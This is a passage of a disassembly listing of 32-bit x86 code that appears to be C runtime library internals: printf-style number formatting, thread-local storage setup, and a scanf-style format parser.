loc_418FF3: ; CODE XREF: sub_418A1C+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_419004
mov [ebp+var_C], eax
loc_419004: ; CODE XREF: sub_418A1C+5D5�j
; sub_418A1C+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_41900E
and [ebp+var_20], 0
loc_41900E: ; CODE XREF: sub_418A1C+5EC�j
lea esi, [ebp+var_55]
loc_419011: ; CODE XREF: sub_418A1C+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_419021
mov eax, ebx
or eax, edi
jz short loc_419045
loc_419021: ; CODE XREF: sub_418A1C+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_4172F0
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_419040
add ecx, [ebp+var_30]
loc_419040: ; CODE XREF: sub_418A1C+61F�j
mov [esi], cl
dec esi
jmp short loc_419011
; ---------------------------------------------------------------------------
loc_419045: ; CODE XREF: sub_418A1C+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_41906F
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_419062
test eax, eax
jnz short loc_41906F
loc_419062: ; CODE XREF: sub_418A1C+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_41906C: ; CODE XREF: sub_418A1C+3B8�j
; sub_418A1C+3C1�j ...
mov [ebp+var_14], eax
loc_41906F: ; CODE XREF: sub_418A1C+270�j
; sub_418A1C+339�j ...
cmp [ebp+var_34], 0
jnz loc_41915E
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_4190A7
test bh, 1
jz short loc_41908C
mov [ebp+var_1C], 2Dh
jmp short loc_4190A0
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_418A1C+668�j
test bl, 1
jz short loc_419097
mov [ebp+var_1C], 2Bh
jmp short loc_4190A0
; ---------------------------------------------------------------------------
loc_419097: ; CODE XREF: sub_418A1C+673�j
test bl, 2
jz short loc_4190A7
mov [ebp+var_1C], 20h
loc_4190A0: ; CODE XREF: sub_418A1C+66E�j
; sub_418A1C+679�j
mov [ebp+var_20], 1
loc_4190A7: ; CODE XREF: sub_418A1C+663�j
; sub_418A1C+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_4190C6
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_4189C1
add esp, 0Ch
loc_4190C6: ; CODE XREF: sub_418A1C+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_4189E5
test bl, 8
pop ecx
jz short loc_4190F1
test bl, 4
jnz short loc_4190F1
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_4189C1
add esp, 0Ch
loc_4190F1: ; CODE XREF: sub_418A1C+6BF�j
; sub_418A1C+6C4�j
cmp [ebp+var_28], 0
jz short loc_419138
cmp [ebp+var_14], 0
jle short loc_419138
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_419106: ; CODE XREF: sub_418A1C+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41E5F7
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_419147
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_4189E5
cmp [ebp+var_40], 0
pop ecx
jnz short loc_419106
jmp short loc_419147
; ---------------------------------------------------------------------------
loc_419138: ; CODE XREF: sub_418A1C+6D9�j
; sub_418A1C+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_4189E5
pop ecx
loc_419147: ; CODE XREF: sub_418A1C+702�j
; sub_418A1C+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_41915E
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_4189C1
add esp, 0Ch
loc_41915E: ; CODE XREF: sub_418A1C+576�j
; sub_418A1C+657�j ...
cmp [ebp+var_2C], 0
jz short loc_419171 ; default
push [ebp+var_2C]
call sub_416D07
and [ebp+var_2C], 0
pop ecx
loc_419171: ; CODE XREF: sub_418A1C+74�j
; sub_418A1C+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_418A51
loc_41917E: ; CODE XREF: sub_418A1C+40�j
pop edi
pop esi
loc_419180: ; CODE XREF: sub_418A1C+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_41C596
leave
retn
sub_418A1C endp
; ---------------------------------------------------------------------------
off_419191 dd offset loc_418C1B ; DATA XREF: sub_418A1C+7A�r
dd offset loc_418A9D ; jump table for switch statement
dd offset loc_418ABA
dd offset loc_418B06
dd offset loc_418B41
dd offset loc_418B4A
dd offset loc_418B82
dd offset loc_418C54
; =============== S U B R O U T I N E =======================================
sub_4191B1 proc near ; CODE XREF: sub_419240:loc_419259�p
; sub_419240:loc_4192A6�p
call sub_41A0ED
mov eax, dword_432390
cmp eax, 0FFFFFFFFh
jz short locret_4191CE
push eax
call dword_422170 ; TlsFree
or dword_432390, 0FFFFFFFFh
locret_4191CE: ; CODE XREF: sub_4191B1+D�j
retn
sub_4191B1 endp
; =============== S U B R O U T I N E =======================================
sub_4191CF proc near ; CODE XREF: sub_416B24�p sub_416B31�p ...
push ebx
push esi
call dword_422008 ; RtlGetLastWin32Error
push dword_432390
mov ebx, eax
call dword_422180 ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_419234
push 88h
push 1
call sub_41E61E
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_41922C
push esi
push dword_432390
call dword_42217C ; TlsSetValue
test eax, eax
jz short loc_41922C
mov dword ptr [esi+54h], offset dword_432C08
mov dword ptr [esi+14h], 1
call dword_422178 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_419234
; ---------------------------------------------------------------------------
loc_41922C: ; CODE XREF: sub_4191CF+2E�j
; sub_4191CF+3F�j
push 10h
call sub_41865A
pop ecx
loc_419234: ; CODE XREF: sub_4191CF+1A�j
; sub_4191CF+5B�j
push ebx
call dword_422174 ; RtlSetLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_4191CF endp
; =============== S U B R O U T I N E =======================================
sub_419240 proc near ; CODE XREF: .text:loc_41877E�p
call sub_41A0A4
test eax, eax
jz short loc_419259
call dword_422184 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_432390, eax
jnz short loc_419261
loc_419259: ; CODE XREF: sub_419240+7�j
call sub_4191B1
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_419261: ; CODE XREF: sub_419240+17�j
push esi
push 88h
push 1
call sub_41E61E
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_4192A6
push esi
push dword_432390
call dword_42217C ; TlsSetValue
test eax, eax
jz short loc_4192A6
mov dword ptr [esi+54h], offset dword_432C08
mov dword ptr [esi+14h], 1
call dword_422178 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192A6: ; CODE XREF: sub_419240+34�j
; sub_419240+45�j
call sub_4191B1
xor eax, eax
pop esi
retn
sub_419240 endp
; =============== S U B R O U T I N E =======================================
sub_4192AF proc near ; CODE XREF: sub_4192C5+52�p
; sub_4192C5+1EF�p ...
dec dword ptr [edx+4]
js short loc_4192BD
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_4192BD: ; CODE XREF: sub_4192AF+3�j
push edx
call sub_41B1A6
pop ecx
retn
sub_4192AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4192C5 proc near ; CODE XREF: sub_416B53+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_42BF10
call __SEH_prolog
mov eax, dword_432A68
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_4192F3: ; CODE XREF: sub_4192C5+88�j
; sub_4192C5+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_419D32
movzx eax, al
push eax
call sub_41E752
pop ecx
test eax, eax
jz short loc_41934F
dec [ebp+var_30]
loc_419311: ; CODE XREF: sub_4192C5+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
mov esi, eax
push esi
call sub_41E752
pop ecx
test eax, eax
jnz short loc_419311
cmp esi, 0FFFFFFFFh
jz short loc_419339
push [ebp+arg_0]
push esi
call sub_41E78C
pop ecx
pop ecx
loc_419339: ; CODE XREF: sub_4192C5+67�j
; sub_4192C5+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41E752
pop ecx
test eax, eax
jnz short loc_419339
jmp short loc_4192F3
; ---------------------------------------------------------------------------
loc_41934F: ; CODE XREF: sub_4192C5+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_419CAE
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_41938C: ; CODE XREF: sub_4192C5+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41E6D9
pop ecx
test eax, eax
jz short loc_4193AD
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_419447
; ---------------------------------------------------------------------------
loc_4193AD: ; CODE XREF: sub_4192C5+D7�j
cmp ebx, 4Eh
jg short loc_419425
jz loc_419447
cmp ebx, 2Ah
jz short loc_419420
cmp ebx, 46h
jz loc_419447
cmp ebx, 49h
jz short loc_4193D5
cmp ebx, 4Ch
jnz short loc_419434
inc [ebp+var_4F]
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_4193D5: ; CODE XREF: sub_4192C5+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_4193F4
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_4193F4
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_4193F4: ; CODE XREF: sub_4192C5+116�j
; sub_4192C5+11E�j
cmp cl, 33h
jnz short loc_419405
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_419405
mov esi, eax
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_419405: ; CODE XREF: sub_4192C5+132�j
; sub_4192C5+13A�j
cmp cl, 64h
jz short loc_419447
cmp cl, 69h
jz short loc_419447
cmp cl, 6Fh
jz short loc_419447
cmp cl, 78h
jz short loc_419447
cmp cl, 58h
jnz short loc_419434
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_419420: ; CODE XREF: sub_4192C5+F6�j
inc [ebp+var_4B]
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_419425: ; CODE XREF: sub_4192C5+EB�j
cmp ebx, 68h
jz short loc_419441
cmp ebx, 6Ch
jz short loc_419439
cmp ebx, 77h
jz short loc_41943C
loc_419434: ; CODE XREF: sub_4192C5+109�j
; sub_4192C5+157�j
inc [ebp+var_4C]
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_419439: ; CODE XREF: sub_4192C5+168�j
inc [ebp+var_4F]
loc_41943C: ; CODE XREF: sub_4192C5+16D�j
inc [ebp+var_4E]
jmp short loc_419447
; ---------------------------------------------------------------------------
loc_419441: ; CODE XREF: sub_4192C5+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_419447: ; CODE XREF: sub_4192C5+E3�j
; sub_4192C5+ED�j ...
cmp [ebp+var_4C], 0
jz loc_41938C
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_419471
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_419474
; ---------------------------------------------------------------------------
loc_419471: ; CODE XREF: sub_4192C5+196�j
mov ebx, [ebp+var_64]
loc_419474: ; CODE XREF: sub_4192C5+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_419492
mov al, [esi]
cmp al, 53h
jz short loc_41948E
cmp al, 43h
jz short loc_41948E
or [ebp+var_4E], 0FFh
jmp short loc_419492
; ---------------------------------------------------------------------------
loc_41948E: ; CODE XREF: sub_4192C5+1BD�j
; sub_4192C5+1C1�j
mov [ebp+var_4E], 1
loc_419492: ; CODE XREF: sub_4192C5+1B7�j
; sub_4192C5+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_4194C9
cmp edi, 63h
jz loc_419529
cmp edi, 7Bh
jz short loc_419529
loc_4194AE: ; CODE XREF: sub_4192C5+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
mov esi, eax
push esi
call sub_41E752
pop ecx
test eax, eax
jnz short loc_4194AE
mov [ebp+var_28], esi
loc_4194C9: ; CODE XREF: sub_4192C5+1D9�j
mov esi, [ebp+arg_0]
loc_4194CC: ; CODE XREF: sub_4192C5+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_4194DD
cmp [ebp+var_48], 0
jz loc_419732
loc_4194DD: ; CODE XREF: sub_4192C5+20C�j
cmp edi, 6Fh
jg loc_419701
jz loc_419A74
cmp edi, 63h
jz loc_4196E0
cmp edi, 64h
jz loc_419A74
jle loc_419727
cmp edi, 67h
jle short loc_419553
cmp edi, 69h
jz short loc_41953B
cmp edi, 6Eh
jnz loc_419727
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_419C86
jmp loc_419CA6
; ---------------------------------------------------------------------------
loc_419529: ; CODE XREF: sub_4192C5+1DE�j
; sub_4192C5+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_4192AF
mov [ebp+var_28], eax
jmp short loc_4194CC
; ---------------------------------------------------------------------------
loc_41953B: ; CODE XREF: sub_4192C5+247�j
push 64h
pop edi
loc_41953E: ; CODE XREF: sub_4192C5+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_41996D
mov [ebp+var_4A], 1
jmp loc_419972
; ---------------------------------------------------------------------------
loc_419553: ; CODE XREF: sub_4192C5+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_41956F
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_419574
; ---------------------------------------------------------------------------
loc_41956F: ; CODE XREF: sub_4192C5+29A�j
cmp ebx, 2Bh
jnz short loc_41958B
loc_419574: ; CODE XREF: sub_4192C5+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_41958E
; ---------------------------------------------------------------------------
loc_41958B: ; CODE XREF: sub_4192C5+2AD�j
mov edi, [ebp+arg_0]
loc_41958E: ; CODE XREF: sub_4192C5+2C4�j
cmp [ebp+var_44], 0
jz short loc_41959D
cmp [ebp+var_48], 15Dh
jle short loc_4195C5
loc_41959D: ; CODE XREF: sub_4192C5+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_4195C5
; ---------------------------------------------------------------------------
loc_4195A6: ; CODE XREF: sub_4192C5+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_4195D0
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
loc_4195C5: ; CODE XREF: sub_4192C5+2D6�j
; sub_4192C5+2DF�j
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jnz short loc_4195A6
loc_4195D0: ; CODE XREF: sub_4192C5+2E9�j
cmp byte_432CB8, bl
jnz short loc_419622
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419622
inc [ebp+var_30]
mov edx, edi
call sub_4192AF
mov ebx, eax
mov al, byte_432CB8
mov [esi], al
inc esi
jmp short loc_419614
; ---------------------------------------------------------------------------
loc_4195F8: ; CODE XREF: sub_4192C5+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419622
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_4192AF
mov ebx, eax
loc_419614: ; CODE XREF: sub_4192C5+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41E6D9
pop ecx
test eax, eax
jnz short loc_4195F8
loc_419622: ; CODE XREF: sub_4192C5+311�j
; sub_4192C5+31B�j ...
cmp [ebp+var_40], 0
jz short loc_419697
cmp ebx, 65h
jz short loc_419632
cmp ebx, 45h
jnz short loc_419697
loc_419632: ; CODE XREF: sub_4192C5+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419697
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_419659
mov [esi], al
inc esi
jmp short loc_41965E
; ---------------------------------------------------------------------------
loc_419659: ; CODE XREF: sub_4192C5+38D�j
cmp ebx, 2Bh
jnz short loc_41968C
loc_41965E: ; CODE XREF: sub_4192C5+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_41967D
and [ebp+var_48], eax
jmp short loc_41968C
; ---------------------------------------------------------------------------
loc_41966D: ; CODE XREF: sub_4192C5+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_419697
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_41967D: ; CODE XREF: sub_4192C5+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
loc_41968C: ; CODE XREF: sub_4192C5+397�j
; sub_4192C5+3A6�j
push ebx
call sub_41E6D9
pop ecx
test eax, eax
jnz short loc_41966D
loc_419697: ; CODE XREF: sub_4192C5+361�j
; sub_4192C5+36B�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4196A8
push edi
push ebx
call sub_41E78C
pop ecx
pop ecx
loc_4196A8: ; CODE XREF: sub_4192C5+3D8�j
cmp [ebp+var_40], 0
jz loc_419D32
cmp [ebp+var_4B], 0
jnz loc_419CA6
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_432A50
add esp, 0Ch
jmp loc_419CA6
; ---------------------------------------------------------------------------
loc_4196E0: ; CODE XREF: sub_4192C5+22A�j
test ecx, ecx
jnz short loc_4196EE
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_4196EE: ; CODE XREF: sub_4192C5+41D�j
; sub_4192C5+44A�j
cmp [ebp+var_4E], 0
jle loc_419879
mov [ebp+var_4D], 1
jmp loc_419879
; ---------------------------------------------------------------------------
loc_419701: ; CODE XREF: sub_4192C5+21B�j
mov eax, edi
sub eax, 70h
jz loc_419A70
sub eax, 3
jz short loc_4196EE
dec eax
dec eax
jz loc_419A74
sub eax, 3
jz loc_41953E
sub eax, 3
jz short loc_419753
loc_419727: ; CODE XREF: sub_4192C5+239�j
; sub_4192C5+24C�j
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
cmp eax, [ebp+var_28]
jz short loc_41973B
loc_419732: ; CODE XREF: sub_4192C5+212�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_419D02
; ---------------------------------------------------------------------------
loc_41973B: ; CODE XREF: sub_4192C5+46B�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_419CA6
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_419CA6
; ---------------------------------------------------------------------------
loc_419753: ; CODE XREF: sub_4192C5+460�j
cmp [ebp+var_4E], 0
jle short loc_41975D
mov [ebp+var_4D], 1
loc_41975D: ; CODE XREF: sub_4192C5+492�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_41977A
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_41977A: ; CODE XREF: sub_4192C5+4A8�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_4197D2
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_416B90
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_4197D2
; ---------------------------------------------------------------------------
loc_41979A: ; DATA XREF: .text:stru_42BF10�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41979E: ; DATA XREF: .text:stru_42BF10�o
mov esp, [ebp+ms_exc.old_esp]
call sub_41C0D8
push 20h
call sub_416E1F
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_4197BE
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_419D32
; ---------------------------------------------------------------------------
loc_4197BE: ; CODE XREF: sub_4192C5+4EE�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_4197D2: ; CODE XREF: sub_4192C5+4BA�j
; sub_4192C5+4D3�j
push 20h
push 0
push ebx
call sub_41E8F0
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_419859
cmp byte ptr [edi], 5Dh
jnz short loc_419859
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_41985C
; ---------------------------------------------------------------------------
loc_4197F3: ; CODE XREF: sub_4192C5+59B�j
inc edi
cmp al, 2Dh
jnz short loc_419843
test dl, dl
jz short loc_419843
mov cl, [edi]
cmp cl, 5Dh
jz short loc_419843
inc edi
cmp dl, cl
jnb short loc_41980C
mov al, cl
jmp short loc_419810
; ---------------------------------------------------------------------------
loc_41980C: ; CODE XREF: sub_4192C5+541�j
mov al, dl
mov dl, cl
loc_419810: ; CODE XREF: sub_4192C5+545�j
cmp dl, al
ja short loc_41983F
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_419824: ; CODE XREF: sub_4192C5+578�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_419824
loc_41983F: ; CODE XREF: sub_4192C5+54D�j
xor dl, dl
jmp short loc_41985C
; ---------------------------------------------------------------------------
loc_419843: ; CODE XREF: sub_4192C5+531�j
; sub_4192C5+535�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_419859: ; CODE XREF: sub_4192C5+51E�j
; sub_4192C5+523�j
mov dl, [ebp+var_39]
loc_41985C: ; CODE XREF: sub_4192C5+52C�j
; sub_4192C5+57C�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_4197F3
test al, al
jz loc_419D32
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_419876
mov [ebp+arg_4], edi
loc_419876: ; CODE XREF: sub_4192C5+5AC�j
mov edi, [ebp+var_68]
loc_419879: ; CODE XREF: sub_4192C5+42D�j
; sub_4192C5+437�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_419891
push [ebp+arg_0]
push [ebp+var_28]
call sub_41E78C
pop ecx
pop ecx
loc_419891: ; CODE XREF: sub_4192C5+5BD�j
; sub_4192C5+754�j ...
cmp [ebp+var_44], 0
jz short loc_4198A5
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_419A37
loc_4198A5: ; CODE XREF: sub_4192C5+5D0�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_419A24
cmp edi, 63h
jz short loc_419905
cmp edi, 73h
jnz short loc_4198D5
cmp eax, 9
jl short loc_4198D0
cmp eax, 0Dh
jle short loc_4198D5
loc_4198D0: ; CODE XREF: sub_4192C5+604�j
cmp eax, 20h
jnz short loc_419905
loc_4198D5: ; CODE XREF: sub_4192C5+5FF�j
; sub_4192C5+609�j
cmp edi, 7Bh
jnz loc_419A24
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_419A24
mov edi, [ebp+var_68]
loc_419905: ; CODE XREF: sub_4192C5+5FA�j
; sub_4192C5+60E�j
cmp [ebp+var_4B], 0
jnz loc_419A1E
cmp [ebp+var_4D], 0
jz loc_419A13
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_432A60
test byte ptr [ecx+eax*2+1], 80h
jz short loc_419940
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_4192AF
mov [ebp+var_1D3], al
loc_419940: ; CODE XREF: sub_4192C5+668�j
push dword_432CB4
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_41E8B8
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_419A16
; ---------------------------------------------------------------------------
loc_41996D: ; CODE XREF: sub_4192C5+27F�j
cmp ebx, 2Bh
jnz short loc_419990
loc_419972: ; CODE XREF: sub_4192C5+289�j
dec [ebp+var_48]
jnz short loc_419981
test ecx, ecx
jz short loc_419981
mov [ebp+var_4C], 1
jmp short loc_419990
; ---------------------------------------------------------------------------
loc_419981: ; CODE XREF: sub_4192C5+6B0�j
; sub_4192C5+6B4�j
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
loc_419990: ; CODE XREF: sub_4192C5+6AB�j
; sub_4192C5+6BA�j
cmp ebx, 30h
jnz loc_419AA5
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_4199ED
cmp bl, 58h
jz short loc_4199ED
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_4199D4
cmp [ebp+var_44], 0
jz short loc_4199CC
dec [ebp+var_48]
jnz short loc_4199CC
inc [ebp+var_4C]
loc_4199CC: ; CODE XREF: sub_4192C5+6FD�j
; sub_4192C5+702�j
push 6Fh
loc_4199CE: ; CODE XREF: sub_4192C5+74C�j
pop edi
jmp loc_419AA5
; ---------------------------------------------------------------------------
loc_4199D4: ; CODE XREF: sub_4192C5+6F7�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_4199E5
push esi
push ebx
call sub_41E78C
pop ecx
pop ecx
loc_4199E5: ; CODE XREF: sub_4192C5+715�j
push 30h
pop ebx
jmp loc_419AA2
; ---------------------------------------------------------------------------
loc_4199ED: ; CODE XREF: sub_4192C5+6E6�j
; sub_4192C5+6EB�j
inc [ebp+var_30]
mov edx, esi
call sub_4192AF
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_419A0F
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_419A0F
inc [ebp+var_4C]
